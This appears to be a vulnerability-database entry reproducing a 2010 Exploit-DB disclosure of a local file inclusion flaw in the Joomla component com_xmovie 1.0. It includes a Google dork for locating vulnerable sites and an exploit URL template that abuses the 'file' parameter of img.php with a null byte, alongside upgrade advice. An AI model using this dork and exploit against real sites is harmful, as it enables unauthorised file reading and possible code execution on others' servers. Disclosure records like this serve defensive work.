header-logo
Suggest Exploit
vendor:
com_xmovie
by:
KelvinX
8,8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: com_xmovie
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'img.php' script. A remote attacker can include arbitrary local files and execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the most recent version of the application
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_xmovie 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 24-2010
# Location: HCM City, Vietnam

------------------------

# Application: com_xmovie
# Version: 1.0
# Vendor: http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/15297
# Google Dorks: inurl:com_xmovie

------------------------

Exploit: http://www.site.com/components/com_xmovie/helpers/img.php?file=[LFI]%00

------------------------

# Solution: Upgrade to the most recent version

Navigation

Suggest Exploit

Services By CQR